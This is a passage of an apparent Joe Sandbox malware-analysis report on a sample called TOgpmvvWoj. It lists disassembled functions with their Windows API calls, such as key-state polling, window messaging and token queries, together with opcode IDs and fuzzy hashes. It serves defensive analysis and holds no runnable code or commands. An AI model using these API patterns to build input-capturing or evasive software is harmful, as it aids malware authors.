                                            • Instruction ID: 436a28024b87b693541e0780abdc84ad49a6da1dea2b9e3ec60f135c955dff04
                                            • Opcode Fuzzy Hash: 82c959d7165ef479e61f56205c003fb248b8fb442fef85cecd2d2e4ef420615e
                                            • Instruction Fuzzy Hash: B541DE35900204AFDB20DF28CC48BEDBBA9EF09310F196176E866B72E1D770AD41DAD1
                                            Function 00E12344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCursorPos.USER32(?), ref: 00E12357
                                            • ScreenToClient.USER32(00ED67B0,?), ref: 00E12374
                                            • GetAsyncKeyState.USER32(00000001), ref: 00E12399
                                            • GetAsyncKeyState.USER32(00000002), ref: 00E123A7
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AsyncState$ClientCursorScreen
                                            • String ID:
                                            • API String ID: 4210589936-0
                                            • Opcode ID: 2a110da4890b4397c861579a055cff814fd2097de0c93763034bdc15b83b84d1
                                            • Instruction ID: 173d247d3da6b02563978bcc29f01efaa0720e865f2f9b64694d5308d950ad88
                                            • Opcode Fuzzy Hash: 2a110da4890b4397c861579a055cff814fd2097de0c93763034bdc15b83b84d1
                                            • Instruction Fuzzy Hash: 22419F3150421AFFCF158F64DC44AE9BBB4BB45364F20531AF925B22A0C77059A4DBA1
                                            Function 00E66920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E6695D
                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 00E669A9
                                            • TranslateMessage.USER32(?), ref: 00E669D2
                                            • DispatchMessageW.USER32(?), ref: 00E669DC
                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E669EB
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                                            • String ID:
                                            • API String ID: 2108273632-0
                                            • Opcode ID: 17b912dad98329405bf83132b212e3d73f6902515a1a7f7324b40231585a4224
                                            • Instruction ID: 6325b5766dae2fbc2a79c72052ca484ff93a0cf99675d1116e9006dc12da2149
                                            • Opcode Fuzzy Hash: 17b912dad98329405bf83132b212e3d73f6902515a1a7f7324b40231585a4224
                                            • Instruction Fuzzy Hash: 1831C231991246AFDB20CFB5FC44BF67BB8EB41388F145167E821F61A1D7349889DBA0
                                            Function 00E68F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetWindowRect.USER32(?,?), ref: 00E68F12
                                            • PostMessageW.USER32(?,00000201,00000001), ref: 00E68FBC
                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00E68FC4
                                            • PostMessageW.USER32(?,00000202,00000000), ref: 00E68FD2
                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00E68FDA
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessagePostSleep$RectWindow
                                            • String ID:
                                            • API String ID: 3382505437-0
                                            • Opcode ID: f42e79d5ac1e712397e5f1b88f004e62674e86615cefc99a7b944c21b12ed41e
                                            • Instruction ID: 76672613ce90400437d91eeeeb07fa0733886b2a4cc388cff6e068c486729613
                                            • Opcode Fuzzy Hash: f42e79d5ac1e712397e5f1b88f004e62674e86615cefc99a7b944c21b12ed41e
                                            • Instruction Fuzzy Hash: CD31C07160021DEFDF14CF68EA4CA9E7BB6EB04315F10422AF925F61D1C7B09954DB91
                                            Function 00E6B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 00E6B6C7
                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E6B6E4
                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E6B71C
                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E6B742
                                            • _wcsstr.LIBCMT ref: 00E6B74C
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                            • String ID:
                                            • API String ID: 3902887630-0
                                            • Opcode ID: eca45de19a787c56d6665a544193cb29f386160a5a8fb5357b4d4cb50e6a0cf4
                                            • Instruction ID: 186ad79bd18a9ff852f56b945c5704bd476dcb7f82f2041031870ce47856bf53
                                            • Opcode Fuzzy Hash: eca45de19a787c56d6665a544193cb29f386160a5a8fb5357b4d4cb50e6a0cf4
                                            • Instruction Fuzzy Hash: 7121D731644204BAEB255B39EC49E7B7FACDF45790F00517BF905EA1A1EB61DC80D6A0
                                            Function 00E9B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E12612: GetWindowLongW.USER32(?,000000EB), ref: 00E12623
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00E9B44C
                                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00E9B471
                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E9B489
                                            • GetSystemMetrics.USER32(00000004), ref: 00E9B4B2
                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00E81184,00000000), ref: 00E9B4D0
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$Long$MetricsSystem
                                            • String ID:
                                            • API String ID: 2294984445-0
                                            • Opcode ID: d9f84aeda8908ccf681ea19cca6b45bdd8330f6c3c2ad983a72a645e2cf0e781
                                            • Instruction ID: bd6e0b06f04dee80cbdb8e97e928281540f7dec1e238c049ca921e2693850c7e
                                            • Opcode Fuzzy Hash: d9f84aeda8908ccf681ea19cca6b45bdd8330f6c3c2ad983a72a645e2cf0e781
                                            • Instruction Fuzzy Hash: 71219171610255AFCF248F39ED04AAA37A4EB05725F11573AF936E61E1F7309810EB80
                                            Function 00E697E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E69802
                                              • Part of subcall function 00E17D2C: _memmove.LIBCMT ref: 00E17D66
                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E69834
                                            • __itow.LIBCMT ref: 00E6984C
                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E69874
                                            • __itow.LIBCMT ref: 00E69885
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$__itow$_memmove
                                            • String ID:
                                            • API String ID: 2983881199-0
                                            • Opcode ID: d93e3e4b3fbd61d16d72b812a382e1d1e2278f0e1f36e25c2ec1d9d5961ec4f5
                                            • Instruction ID: 19d3fdacd643df1f9051af5a6bdaa87be89a4c3885af5a422591c8c6b2256439
                                            • Opcode Fuzzy Hash: d93e3e4b3fbd61d16d72b812a382e1d1e2278f0e1f36e25c2ec1d9d5961ec4f5
                                            • Instruction Fuzzy Hash: 2921C831740308ABDB149A75AC8AEEE7BFCDF4A754F042029F904FB252D6708D4597D1
                                            Function 00E112F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                            Download Yara Rule
                                            APIs
                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E1134D
                                            • SelectObject.GDI32(?,00000000), ref: 00E1135C
                                            • BeginPath.GDI32(?), ref: 00E11373
                                            • SelectObject.GDI32(?,00000000), ref: 00E1139C
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ObjectSelect$BeginCreatePath
                                            • String ID:
                                            • API String ID: 3225163088-0
                                            • Opcode ID: 9aed0e25cc14c6fea8afc11679ae416d787aafde0f4923460dad7bb584b9be17
                                            • Instruction ID: d2300e69d3fc0a6000d47995c4a1122cf2df054f56c5add0cacba83381b75688
                                            • Opcode Fuzzy Hash: 9aed0e25cc14c6fea8afc11679ae416d787aafde0f4923460dad7bb584b9be17
                                            • Instruction Fuzzy Hash: 08216A74801308EFDB149F66FC057A97BB8FB00326F148267F920B61A4D37198D9EB90
                                            Function 00E6C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memcmp
                                            • String ID:
                                            • API String ID: 2931989736-0
                                            • Opcode ID: 91cc90edfbcac704835001a9fc33261397cab46b6e96bb166287bf13a23bf53e
                                            • Instruction ID: 4aed135e999b3e753b3edf7d5ede03d4b700f489fa4f32c2da4fafcaab931b35
                                            • Opcode Fuzzy Hash: 91cc90edfbcac704835001a9fc33261397cab46b6e96bb166287bf13a23bf53e
                                            • Instruction Fuzzy Hash: 8D01F9716862053BD204A6246C46FBB77AC9B173E8F246059FE45BB243E650EE11C2E0
                                            Function 00E74D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCurrentThreadId.KERNEL32 ref: 00E74D5C
                                            • __beginthreadex.LIBCMT ref: 00E74D7A
                                            • MessageBoxW.USER32(?,?,?,?), ref: 00E74D8F
                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E74DA5
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E74DAC
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                            • String ID:
                                            • API String ID: 3824534824-0
                                            • Opcode ID: cfa4dad47d0f35fafa61a87d4e0ff3fc79118a16c3ce4b1d0e9b17ec9b5b8c31
                                            • Instruction ID: c627fc443441b6cc87d982bc3ab3a4e22ae52becabebf6c4eece1e40e0f76e81
                                            • Opcode Fuzzy Hash: cfa4dad47d0f35fafa61a87d4e0ff3fc79118a16c3ce4b1d0e9b17ec9b5b8c31
                                            • Instruction Fuzzy Hash: 521108B2905244BFC7119BADEC08ADA7FACEB45324F148267F918F32A1D7758D4887A0
                                            Function 00E6874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E68766
                                            • GetLastError.KERNEL32(?,00E6822A,?,?,?), ref: 00E68770
                                            • GetProcessHeap.KERNEL32(00000008,?,?,00E6822A,?,?,?), ref: 00E6877F
                                            • HeapAlloc.KERNEL32(00000000,?,00E6822A,?,?,?), ref: 00E68786
                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E6879D
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                            • String ID:
                                            • API String ID: 842720411-0
                                            • Opcode ID: 7f02c60288fe0eecb7563531b8ab3beab03b03e63855a5f7a1bdd1d6c3cc25cb
                                            • Instruction ID: eebd1bb7e6aef75d538ee48b09e704e2b5ff6351ba61d600c1297fecaaf61601
                                            • Opcode Fuzzy Hash: 7f02c60288fe0eecb7563531b8ab3beab03b03e63855a5f7a1bdd1d6c3cc25cb
                                            • Instruction Fuzzy Hash: BF011D71645204FFDB204FA6ED88D6B7BADFF89795720057BF849E2260DA319D04CAA0
                                            Function 00E754E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E75502
                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E75510
                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E75518
                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E75522
                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E7555E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                            • String ID:
                                            • API String ID: 2833360925-0
                                            • Opcode ID: 91d2d36edf9264c385aa211dcc782f22dc7bfa07867ea814fdeba99f36b1bebd
                                            • Instruction ID: 56fc7e18cfc5377dbe80fc58b9870261ff5370c9a3e10621742bcb09bbd3791b
                                            • Opcode Fuzzy Hash: 91d2d36edf9264c385aa211dcc782f22dc7bfa07867ea814fdeba99f36b1bebd
                                            • Instruction Fuzzy Hash: 57015732C01A29DBCF00EFEAE888AEDBB79FB09701F004157E905F2141DB709658C7A1
                                            Function 00E67652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E6758C,80070057,?,?,?,00E6799D), ref: 00E6766F
                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E6758C,80070057,?,?), ref: 00E6768A
                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E6758C,80070057,?,?), ref: 00E67698
                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E6758C,80070057,?), ref: 00E676A8
                                            • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E6758C,80070057,?,?), ref: 00E676B4
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                            • String ID:
                                            • API String ID: 3897988419-0
                                            • Opcode ID: 11165b1afce2e670649bdbaa38d789489fd7b00e875d5ba2a3b3d838c12a60eb
                                            • Instruction ID: f5711feb05b297c632261f8e7ac8e6d9191fce78bdb05a7cbce6376d5a940917
                                            • Opcode Fuzzy Hash: 11165b1afce2e670649bdbaa38d789489fd7b00e875d5ba2a3b3d838c12a60eb
                                            • Instruction Fuzzy Hash: 4501D4B2600604BFDB108F19EC08BAE7FACEB44B95F10012AFD45E2211EB71DD5087A0
                                            Function 00E685F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E68608
                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E68612
                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E68621
                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E68628
                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E6863E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                            • String ID:
                                            • API String ID: 44706859-0
                                            • Opcode ID: ecbae172079a541ad91c58507c3acb3853e721e68b1e44643fe502bd238c97c1
                                            • Instruction ID: bfca52133d5308290287f1169acfe771d73ec33b009d83293a82804efb241371
                                            • Opcode Fuzzy Hash: ecbae172079a541ad91c58507c3acb3853e721e68b1e44643fe502bd238c97c1
                                            • Instruction Fuzzy Hash: 80F06231241204BFEB100FA6ED8DE6F3BACEF89798B105627F945E6160CB71DC45DA60
                                            Function 00E68652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E68669
                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E68673
                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E68682
                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E68689
                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E6869F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                            • String ID:
                                            • API String ID: 44706859-0
                                            • Opcode ID: a6efae7c42652476bda466bc2a52ca0a437370b079fd8e1485c6701292f3b1f0
                                            • Instruction ID: bbdb81d9742324c2f926d41ba1077eba83280deceb4fd6747a7efbb2d659b935
                                            • Opcode Fuzzy Hash: a6efae7c42652476bda466bc2a52ca0a437370b079fd8e1485c6701292f3b1f0
                                            • Instruction Fuzzy Hash: FAF06271241304BFEB111FA6EC89E6B3BACEF89798B100137F945E6150CB71DD45DA60
                                            Function 00E6C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,000003E9), ref: 00E6C6BA
                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E6C6D1
                                            • MessageBeep.USER32(00000000), ref: 00E6C6E9
                                            • KillTimer.USER32(?,0000040A), ref: 00E6C705
                                            • EndDialog.USER32(?,00000001), ref: 00E6C71F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                            • String ID:
                                            • API String ID: 3741023627-0
                                            • Opcode ID: 37023e1d9dec15a9aae7937b092d0743ada1afa7f6d456b326f82a9c256e9520
                                            • Instruction ID: 14ed3fd54b120c6ca49ce92cf40639090cb92f6da18a9df941a0a7bc6f9bef5b
                                            • Opcode Fuzzy Hash: 37023e1d9dec15a9aae7937b092d0743ada1afa7f6d456b326f82a9c256e9520
                                            • Instruction Fuzzy Hash: C101A270540304ABEB205B21EC4EFA677B8FF04B45F04166BF582F10E1DBE4A9588F80
